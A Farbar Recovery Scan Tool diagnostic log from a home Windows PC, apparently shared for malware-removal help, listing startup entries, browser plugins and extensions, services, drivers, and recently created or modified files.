HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [googletalk] => C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Google Update] => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-04-10] (Google Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: G - G:\sources\sperr32.exe x64
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Nick\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShell.dll (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKCU\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/?pc=Z016&form=ZGAPHP
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com?fr=hp-avast&type=odc268
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.yahoo.com?fr=hp-avast&type=odc268
SearchScopes: HKCU - {8A64D544-98BB-C260-590A-335EB1FB0846} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default
FF Homepage: hxxp://www.google.com/
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\LogMeInClient@logmein.com [2014-10-28]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-12-16]
FF Extension: Reddit Enhancement Suite - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\jid1-xUfzOsOFlzSOXg@jetpack.xpi [2013-05-17]
FF Extension: FlashGot - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2011-03-22]
FF Extension: StumbleUpon - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-12-30]
FF Extension: Adblock Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-27]
FF Extension: Tab Mix Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2011-05-11]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-11-01]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-11-21]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-17]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-07-07]
FF Extension: No Name - wrc@avast.com [Not Found]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Pin It) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeocpmaimgdkdkkhnilgfoicilnefefh [2014-07-06]
CHR Extension: (Hot Virtual Keyboard Extension) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\bdejgojmfhngmomodldpdppfbhoajadl [2014-09-04]
CHR Extension: (YouTube) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-17]
CHR Extension: (Tetris Flash) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhhalmjbofkjcgefcaejjdicdddpkkk [2014-07-06]
CHR Extension: (Google Search) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-07]
CHR Extension: (RealDownloader) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2013-01-17]
CHR Extension: (Music Plus for Google Play Music) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipfnecmlncaiipncipkgijboddcdmego [2014-08-25]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-07]
CHR Extension: (Pink My Facebook) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo [2014-09-23]
CHR Extension: (Gmail) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-17]
CHR Extension: (A HREF) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkanabbomegdcfhkfppalghjamfekegb [2014-10-13]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-10-26]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-10-26] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe [3192344 2014-10-26] (Avast Software)
S4 Futuremark SystemInfo Service; C:\Program Files\Futuremark\Futuremark SystemInfo\FMSISvc.exe [135584 2011-12-09] (Futuremark Corporation)
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1440080 2013-06-28] (LogMeIn Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.0.285\McCHSvc.exe [234776 2012-09-05] (McAfee, Inc.)
S3 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 uvnc_service; C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe [1795864 2014-10-01] (UltraVNC)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-10-26] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-10-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr.sys [55240 2014-10-26] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-10-26] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-10-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [422760 2014-10-26] (AVAST Software)
R1 aswTdi; C:\Windows\system32\drivers\aswTdi.sys [57928 2014-10-26] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-10-26] ()
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [242240 2012-10-05] (DT Soft Ltd)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [59388 2009-11-08] (PowerISO Computing, Inc.) [File not signed]
R2 VBoxAswDrv; C:\Program Files\Alwil Software\Avast5\ng\vbox\VBoxAswDrv.sys [218192 2014-10-26] (Avast Software)
S3 zghsdiag; C:\Windows\System32\DRIVERS\zghsdiag.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsnmea; C:\Windows\System32\DRIVERS\zghsnmea.sys [106752 2011-05-26] (ZTE Incorporated)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 22:23 - 2014-11-01 22:23 - 01105920 _____ (Farbar) C:\Users\Nick\Desktop\FRST.exe
2014-11-01 12:39 - 2014-11-01 12:39 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-39-27.021-AvastVBoxSVC.exe-2552.log
2014-11-01 12:31 - 2014-11-01 12:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-31-32.097-aswFe.exe-4892.log
2014-11-01 12:16 - 2014-11-01 12:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-16-09.090-aswFe.exe-4424.log
2014-11-01 12:16 - 2014-11-01 12:16 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-16-00.068-AvastVBoxSVC.exe-3784.log
2014-11-01 12:04 - 2014-11-01 12:04 - 00000000 ____D () C:\Windows\Sun
2014-11-01 12:02 - 2014-11-01 12:02 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-11-01 12:02 - 2014-11-01 12:00 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-11-01 12:01 - 2014-11-01 12:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-11-01 11:58 - 2014-11-01 11:58 - 00638376 _____ (Oracle Corporation) C:\Users\Nick\Desktop\jre-8u25-windows-i586-iftw.exe
2014-11-01 11:55 - 2014-11-01 11:55 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-01 11:48 - 2014-11-01 22:24 - 00020848 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-01 11:45 - 2014-11-01 11:45 - 00002333 _____ () C:\Users\Nick\Desktop\JRT.txt
2014-11-01 11:38 - 2014-11-01 11:38 - 00000000 ____D () C:\Windows\ERUNT
2014-11-01 11:37 - 2014-11-01 11:38 - 00000000 ____D () C:\Windows\system32\vbox
2014-11-01 11:37 - 2014-11-01 11:37 - 01706359 _____ (Thisisu) C:\Users\Nick\Desktop\JRT.exe
2014-11-01 10:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2014-11-01 10:55 - 2014-11-01 11:32 - 00000000 ____D () C:\AdwCleaner
2014-11-01 10:55 - 2014-11-01 10:55 - 01375089 _____ () C:\Users\Nick\Desktop\AdwCleaner.exe
2014-11-01 10:22 - 2014-11-01 10:52 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-11-01 10:21 - 2014-11-01 10:52 - 00000000 ____D () C:\Users\Nick\Desktop\mbar
2014-11-01 10:20 - 2014-11-01 10:20 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Nick\Desktop\mbar-1.07.0.1012.exe
2014-11-01 10:09 - 2014-11-01 10:09 - 00039769 _____ () C:\Users\Nick\Desktop\Addition.txt
2014-11-01 10:07 - 2014-11-01 22:24 - 00000000 ____D () C:\FRST
2014-11-01 09:52 - 2014-11-01 09:52 - 00854448 _____ () C:\Users\Nick\Desktop\SecurityCheck.exe
2014-10-28 12:23 - 2014-10-28 12:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:14 - 00000000 ____D () C:\Program Files\uvnc bvba
2014-10-26 21:28 - 2014-10-26 21:28 - 00291352 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-10-26 21:28 - 2014-10-26 21:28 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-10-26 21:28 - 2014-10-26 21:28 - 00001842 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2014-10-26 21:18 - 2014-10-26 21:23 - 00004245 _____ () C:\Windows\system32\jupdate-1.7.0_71-b14.log
2014-10-26 20:55 - 2014-10-26 20:55 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{C904B1C1-3E1E-4488-AF25-7A18B11AC300}
2014-10-26 19:59 - 2014-11-01 10:22 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 18:22 - 2014-10-26 18:26 - 00000859 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-26 18:22 - 2014-10-26 18:22 - 00000000 ____D () C:\Users\Dylan\AppData\Roaming\Malwarebytes
2014-10-22 18:44 - 2014-10-22 18:45 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{65D13997-5F32-456F-9964-9BB07D32E768}
2014-10-21 03:17 - 2014-06-15 15:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 03637248 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2014-10-21 03:16 - 2014-09-23 15:27 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-21 03:15 - 2014-09-23 16:37 - 06119936 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-21 03:15 - 2014-09-23 16:37 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-21 03:15 - 2014-09-23 16:37 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-21 03:15 - 2014-09-23 11:05 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-21 03:13 - 2014-09-27 16:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-21 03:03 - 2014-09-04 16:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-21 03:00 - 2014-09-16 09:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-09 08:47 - 2014-10-09 08:47 - 00155248 _____ () C:\Windows\Minidump\Mini100914-01.dmp
2014-10-09 08:22 - 2014-10-09 08:22 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{69E0C68D-60C0-41AE-8CBC-FD37C8FBD37E}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 22:20 - 2010-11-20 21:01 - 00000420 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job
2014-11-01 22:18 - 2006-11-02 05:35 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-11-01 22:16 - 2013-04-10 14:22 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job
2014-11-01 22:06 - 2012-04-03 11:24 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-01 21:33 - 2010-11-20 20:35 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-01 21:33 - 2010-11-20 20:35 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-01 20:55 - 2012-04-18 16:44 - 01765663 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 20:38 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-01 20:38 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-01 12:38 - 2012-04-27 19:39 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-11-01 12:38 - 2006-11-02 06:00 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-01 12:37 - 2006-11-02 06:00 - 00032556 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-11-01 12:03 - 2013-10-16 09:39 - 00000000 ____D () C:\ProgramData\Oracle
2014-11-01 12:01 - 2010-12-24 20:28 - 00000000 ____D () C:\Program Files\Opera
2014-11-01 11:59 - 2010-12-06 17:58 - 00000000 ____D () C:\Program Files\Java
2014-11-01 11:34 - 2013-10-20 11:02 - 00806986 _____ () C:\Windows\PFRO.log
2014-11-01 10:55 - 2014-08-31 11:57 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-01 08:16 - 2013-04-10 14:22 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job
2014-11-01 04:37 - 2010-11-25 21:52 - 00000416 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job
2014-10-31 21:28 - 2011-07-07 12:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
